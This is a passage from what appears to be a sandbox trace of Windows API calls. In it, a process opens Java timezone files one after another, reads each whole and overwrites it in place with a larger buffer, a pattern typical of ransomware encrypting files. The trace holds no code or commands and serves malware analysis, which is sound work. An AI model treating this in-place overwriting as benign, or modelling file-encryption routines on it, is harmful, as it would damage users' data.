dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0136.064] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0136.064] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x1b5 [0136.064] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0136.064] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.064] ReleaseMutex (hMutex=0x168) returned 1 [0136.064] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Hovd", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0136.064] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Hovd", cchWideChar=4, lpMultiByteStr=0x1f7ace4, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Hovd", lpUsedDefaultChar=0x0) returned 4 [0136.064] ReadFile (in: hFile=0x1dc, lpBuffer=0x26dd2c8, nNumberOfBytesToRead=0x1b5, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26dd2c8*, lpNumberOfBytesRead=0x331f2bc*=0x1b5, lpOverlapped=0x0) returned 1 [0136.065] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0136.065] WriteFile (in: hFile=0x1dc, lpBuffer=0x2890128*, nNumberOfBytesToWrite=0x73d, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2890128*, lpNumberOfBytesWritten=0x331f2d0*=0x73d, lpOverlapped=0x0) returned 1 [0136.065] CloseHandle (hObject=0x1dc) returned 1 [0136.066] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Karachi" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\karachi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0136.066] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0136.066] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x99 [0136.066] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0136.066] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.066] ReleaseMutex (hMutex=0x168) returned 1 [0136.066] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Karachi", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0136.066] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Karachi", cchWideChar=7, lpMultiByteStr=0x1f7ace4, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Karachi", lpUsedDefaultChar=0x0) returned 7 [0136.066] ReadFile (in: hFile=0x1dc, lpBuffer=0x262ff58, nNumberOfBytesToRead=0x99, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x262ff58*, lpNumberOfBytesRead=0x331f2bc*=0x99, lpOverlapped=0x0) returned 1 [0136.067] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0136.067] WriteFile (in: hFile=0x1dc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x621, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x331f2d0*=0x621, lpOverlapped=0x0) returned 1 [0136.068] CloseHandle (hObject=0x1dc) returned 1 [0136.068] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kuwait" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kuwait"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0136.070] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0136.070] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x41 [0136.070] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0136.070] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.070] ReleaseMutex (hMutex=0x168) returned 1 [0136.070] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Kuwait", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0136.070] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Kuwait", cchWideChar=6, lpMultiByteStr=0x1f7ace4, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Kuwait", lpUsedDefaultChar=0x0) returned 6 [0136.070] ReadFile (in: hFile=0x1dc, lpBuffer=0x1fc21d8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc21d8*, lpNumberOfBytesRead=0x331f2bc*=0x41, lpOverlapped=0x0) returned 1 [0136.071] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0136.071] WriteFile (in: hFile=0x1dc, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5c9, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x331f2d0*=0x5c9, lpOverlapped=0x0) returned 1 [0136.071] CloseHandle (hObject=0x1dc) returned 1 [0136.072] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Novosibirsk" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\novosibirsk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0136.072] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0136.072] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x24d [0136.072] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0136.072] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.072] ReleaseMutex (hMutex=0x168) returned 1 [0136.072] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Novosibirsk", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0136.072] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Novosibirsk", cchWideChar=11, lpMultiByteStr=0x1f7346c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Novosibirsk", lpUsedDefaultChar=0x0) returned 11 [0136.072] ReadFile (in: hFile=0x1dc, lpBuffer=0x1f65158, nNumberOfBytesToRead=0x24d, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f65158*, lpNumberOfBytesRead=0x331f2bc*=0x24d, lpOverlapped=0x0) returned 1 [0136.074] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0136.074] WriteFile (in: hFile=0x1dc, lpBuffer=0x2882dd8*, nNumberOfBytesToWrite=0x7d5, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2882dd8*, lpNumberOfBytesWritten=0x331f2d0*=0x7d5, lpOverlapped=0x0) returned 1 [0136.074] CloseHandle (hObject=0x1dc) returned 1 [0136.074] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Rangoon" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\rangoon"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0136.075] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0136.075] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x55 [0136.075] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0136.075] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.076] ReleaseMutex (hMutex=0x168) returned 1 [0136.076] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rangoon", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0136.076] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rangoon", cchWideChar=7, lpMultiByteStr=0x1f7ace4, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Rangoon", lpUsedDefaultChar=0x0) returned 7 [0136.076] ReadFile (in: hFile=0x1dc, lpBuffer=0x1fbafe0, nNumberOfBytesToRead=0x55, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fbafe0*, lpNumberOfBytesRead=0x331f2bc*=0x55, lpOverlapped=0x0) returned 1 [0136.077] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0136.077] WriteFile (in: hFile=0x1dc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5dd, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x331f2d0*=0x5dd, lpOverlapped=0x0) returned 1 [0136.077] CloseHandle (hObject=0x1dc) returned 1 [0136.077] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Shanghai" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\shanghai"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0136.078] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0136.078] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xc9 [0136.078] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0136.078] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.078] ReleaseMutex (hMutex=0x168) returned 1 [0136.078] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Shanghai", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0136.078] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Shanghai", cchWideChar=8, lpMultiByteStr=0x1f735ec, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Shanghai", lpUsedDefaultChar=0x0) returned 8 [0136.078] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ed5ff8, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ed5ff8*, lpNumberOfBytesRead=0x331f2bc*=0xc9, lpOverlapped=0x0) returned 1 [0136.079] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0136.079] WriteFile (in: hFile=0x1dc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x651, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x331f2d0*=0x651, lpOverlapped=0x0) returned 1 [0136.080] CloseHandle (hObject=0x1dc) returned 1 [0136.080] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Ulaanbaatar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\ulaanbaatar"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0136.080] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0136.080] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x1b5 [0136.080] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0136.080] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.080] ReleaseMutex (hMutex=0x168) returned 1 [0136.081] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Ulaanbaatar", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0136.081] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Ulaanbaatar", cchWideChar=11, lpMultiByteStr=0x1f7340c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Ulaanbaatar", lpUsedDefaultChar=0x0) returned 11 [0136.081] ReadFile (in: hFile=0x1dc, lpBuffer=0x26dd2c8, nNumberOfBytesToRead=0x1b5, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26dd2c8*, lpNumberOfBytesRead=0x331f2bc*=0x1b5, lpOverlapped=0x0) returned 1 [0136.083] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0136.083] WriteFile (in: hFile=0x1dc, lpBuffer=0x2890128*, nNumberOfBytesToWrite=0x73d, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2890128*, lpNumberOfBytesWritten=0x331f2d0*=0x73d, lpOverlapped=0x0) returned 1 [0136.083] CloseHandle (hObject=0x1dc) returned 1 [0136.084] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Azores" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\azores"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0136.084] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0136.084] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x74c [0136.084] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0136.084] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.084] ReleaseMutex (hMutex=0x168) returned 1 [0136.084] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Azores", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0136.084] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Azores", cchWideChar=6, lpMultiByteStr=0x1f7ace4, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Azores", lpUsedDefaultChar=0x0) returned 6 [0136.085] ReadFile (in: hFile=0x1dc, lpBuffer=0x2890128, nNumberOfBytesToRead=0x74c, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2890128*, lpNumberOfBytesRead=0x331f2bc*=0x74c, lpOverlapped=0x0) returned 1 [0136.619] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0136.620] WriteFile (in: hFile=0x1dc, lpBuffer=0x1ea3958*, nNumberOfBytesToWrite=0xcd4, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesWritten=0x331f2d0*=0xcd4, lpOverlapped=0x0) returned 1 [0136.620] CloseHandle (hObject=0x1dc) returned 1 [0136.937] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Stanley" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\stanley"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0139.379] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0139.379] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x26d [0139.379] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0139.379] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0139.379] ReleaseMutex (hMutex=0x168) returned 1 [0139.379] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Stanley", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0139.379] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Stanley", cchWideChar=7, lpMultiByteStr=0x1f7ad2c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Stanley", lpUsedDefaultChar=0x0) returned 7 [0139.380] ReadFile (in: hFile=0x208, lpBuffer=0x286eca8, nNumberOfBytesToRead=0x26d, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x286eca8*, lpNumberOfBytesRead=0x331f2bc*=0x26d, lpOverlapped=0x0) returned 1 [0139.381] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0139.381] WriteFile (in: hFile=0x208, lpBuffer=0x287d138*, nNumberOfBytesToWrite=0x7f5, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x287d138*, lpNumberOfBytesWritten=0x331f2d0*=0x7f5, lpOverlapped=0x0) returned 1 [0139.381] CloseHandle (hObject=0x208) returned 1 [0139.382] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Hobart" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\hobart"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0139.383] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0139.383] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x508 [0139.383] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0139.383] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0139.383] ReleaseMutex (hMutex=0x168) returned 1 [0139.383] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Hobart", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0139.383] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Hobart", cchWideChar=6, lpMultiByteStr=0x1f7ad2c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Hobart", lpUsedDefaultChar=0x0) returned 6 [0139.383] ReadFile (in: hFile=0x208, lpBuffer=0x1f3e3a8, nNumberOfBytesToRead=0x508, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f3e3a8*, lpNumberOfBytesRead=0x331f2bc*=0x508, lpOverlapped=0x0) returned 1 [0139.387] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0139.387] WriteFile (in: hFile=0x208, lpBuffer=0x2870cb8*, nNumberOfBytesToWrite=0xa90, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2870cb8*, lpNumberOfBytesWritten=0x331f2d0*=0xa90, lpOverlapped=0x0) returned 1 [0139.387] CloseHandle (hObject=0x208) returned 1 [0139.387] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\EET" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\eet"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0139.389] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0139.389] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x430 [0139.389] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0139.389] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0139.389] ReleaseMutex (hMutex=0x168) returned 1 [0139.389] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EET", cchWideChar=3, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 3 [0139.389] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EET", cchWideChar=3, lpMultiByteStr=0x1f7ad44, cbMultiByte=3, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EET", lpUsedDefaultChar=0x0) returned 3 [0139.389] ReadFile (in: hFile=0x208, lpBuffer=0x269cae8, nNumberOfBytesToRead=0x430, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x269cae8*, lpNumberOfBytesRead=0x331f2bc*=0x430, lpOverlapped=0x0) returned 1 [0139.391] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0139.392] WriteFile (in: hFile=0x208, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x9b8, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x331f2d0*=0x9b8, lpOverlapped=0x0) returned 1 [0139.392] CloseHandle (hObject=0x208) returned 1 [0139.392] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+2" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+2"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 